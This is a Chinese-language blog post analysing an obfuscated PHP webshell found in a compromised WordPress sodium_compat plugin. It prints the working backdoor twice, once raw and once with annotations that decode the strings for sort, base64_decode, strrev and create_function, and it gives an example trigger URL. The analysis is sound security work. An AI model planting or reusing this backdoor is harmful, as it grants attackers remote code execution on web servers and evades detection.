简介
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。1
分析
2019年11月27日,WordPress 站点不能访问,分析之后发现 WordPress 插件 sodium_compat 被人加料,代码如下。暂时不清楚黑客是如何注入,被加料内容是一个典型的 webshell 网站后门,利用 php 的 create_function 和 base64_decode 函数,且使用了大量的字符串处理来逃避 webshell 检测。
源码
$ALpmKtOl8475 = "/jqsbr9ia654yug0ew1)*7dtp;m8lx_2fnvh3zo.ck(";
$kHTiDsnt7866 = "";
foreach([3,38,5,23] as $E){
$kHTiDsnt7866 .= $ALpmKtOl8475[$E];
}
if(isset($_REQUEST /*IlrKKxaEyQYkVUUVAQbCmgexCXoxvTrWqZxLlUthFJqduXYQfOEmKNTKGadaSfRBShxfGLFeFWBpNsWfEfbqbOCqDwLWiKmAoIrTUVLuzCGVahNNWQrOmifqtmmmrJzS*/["$kHTiDsnt7866"])){
$DDebczKe7430 = $_REQUEST /*IlrKKxaEyQYkVUUVAQbCmgexCXoxvTrWqZxLlUthFJqduXYQfOEmKNTKGadaSfRBShxfGLFeFWBpNsWfEfbqbOCqDwLWiKmAoIrTUVLuzCGVahNNWQrOmifqtmmmrJzS*/["$kHTiDsnt7866"];
$EqHZGFsG5581 = "";
$DmPqoAru8529 = "";
/*BFqVBKdwHVucHDLSKCdwDiTVwngSbkntEQocQxHZWXqOHINzkwYNpFtIhaZOzZmlBugDZEeVeugTChJBDKMyUvNOMfLdQhewrsRxbevlgjPspZyWQsuBuFbokFrMaJQa*/
foreach([4,8,3,16,9,11,30,22,16,40,38,22,16] as $E){
$EqHZGFsG5581 .= $ALpmKtOl8475[$E];
}
/*bJvLXYFVbsskXlgKXtVZMihhCyROeEvZEuTsNlIYPVOwxQISXNpPYfiuOKkkcTUqbyksvSGuxRecSOetQBEaewcaSqwZTBmbrWvMYSwkZgnbggtoDJLEdgPaRpCiDDyg*/
foreach([3,23,5,5,16,34] as $E){
$DmPqoAru8529 .= $ALpmKtOl8475[$E];
}
/*BNAAulguuQqtnSBDkkMBWjwtJICKhYDEEYyHJYKXJSmfoXDkKeHSIGWguuvFFNCwBCphSfhTRoclivzmdsvCnwqmZAiVWVuHrAabUFyjSeLKWnoHqZdGNGDMxZODhxgl*/
$E = $DmPqoAru8529('n'.'o'.'i'.'t'.''.''.''.''.'c'.'n'.'u'.''.''.'f'.''.''.'_'.''.''.''.'e'.'t'.'a'.'e'.''.''.''.''.'r'.'c');
$E = $E("", $EqHZGFsG5581($DDebczKe7430));
$E();
exit();
}
解析
$ALpmKtOl8475 = "/jqsbr9ia654yug0ew1)*7dtp;m8lx_2fnvh3zo.ck(";
$kHTiDsnt7866 = "";
foreach([3,38,5,23] as $E){
$kHTiDsnt7866 .= $ALpmKtOl8475[$E];
}
## $kHTiDsnt7866 => 字符串 sort 接收注入代码用
## 过滤请求
if(isset($_REQUEST /*IlrKKxaEyQYkVUUVAQbCmgexCXoxvTrWqZxLlUthFJqduXYQfOEmKNTKGadaSfRBShxfGLFeFWBpNsWfEfbqbOCqDwLWiKmAoIrTUVLuzCGVahNNWQrOmifqtmmmrJzS*/["$kHTiDsnt7866"])){
$DDebczKe7430 = $_REQUEST /*IlrKKxaEyQYkVUUVAQbCmgexCXoxvTrWqZxLlUthFJqduXYQfOEmKNTKGadaSfRBShxfGLFeFWBpNsWfEfbqbOCqDwLWiKmAoIrTUVLuzCGVahNNWQrOmifqtmmmrJzS*/["$kHTiDsnt7866"];
$EqHZGFsG5581 = "";
$DmPqoAru8529 = "";
/*BFqVBKdwHVucHDLSKCdwDiTVwngSbkntEQocQxHZWXqOHINzkwYNpFtIhaZOzZmlBugDZEeVeugTChJBDKMyUvNOMfLdQhewrsRxbevlgjPspZyWQsuBuFbokFrMaJQa*/
foreach([4,8,3,16,9,11,30,22,16,40,38,22,16] as $E){
$EqHZGFsG5581 .= $ALpmKtOl8475[$E];
}
## $EqHZGFsG5581 => 函数 base64_decode
/*bJvLXYFVbsskXlgKXtVZMihhCyROeEvZEuTsNlIYPVOwxQISXNpPYfiuOKkkcTUqbyksvSGuxRecSOetQBEaewcaSqwZTBmbrWvMYSwkZgnbggtoDJLEdgPaRpCiDDyg*/
foreach([3,23,5,5,16,34] as $E){
$DmPqoAru8529 .= $ALpmKtOl8475[$E];
}
## $DmPqoAru8529 => 函数 strrev
/*BNAAulguuQqtnSBDkkMBWjwtJICKhYDEEYyHJYKXJSmfoXDkKeHSIGWguuvFFNCwBCphSfhTRoclivzmdsvCnwqmZAiVWVuHrAabUFyjSeLKWnoHqZdGNGDMxZODhxgl*/
$E = $DmPqoAru8529('n'.'o'.'i'.'t'.''.''.''.''.'c'.'n'.'u'.''.''.'f'.''.''.'_'.''.''.''.'e'.'t'.'a'.'e'.''.''.''.''.'r'.'c');
## $E => create_function
$E = $E("", $EqHZGFsG5581($DDebczKe7430));
## $DDebczKe7430 => 注入代码 base64_encode 值
## 示例 echo phpinfo(); base64 加密后得到 ZWNobyBwaHBpbmZvKCk7
## 请求 http://${wordpress.site}/wp-admin/wp-includes/sodium_compat/lib/constants.php?sort=ZWNobyBwaHBpbmZvKCk7 时会输出 phpinfo 信息,如果服务器生产环境没有关闭 exec,system 等函数,那么后果不堪设想。
$E();
exit();
}
文献引用
© 著作权归作者所有
举报
发表评论
0/200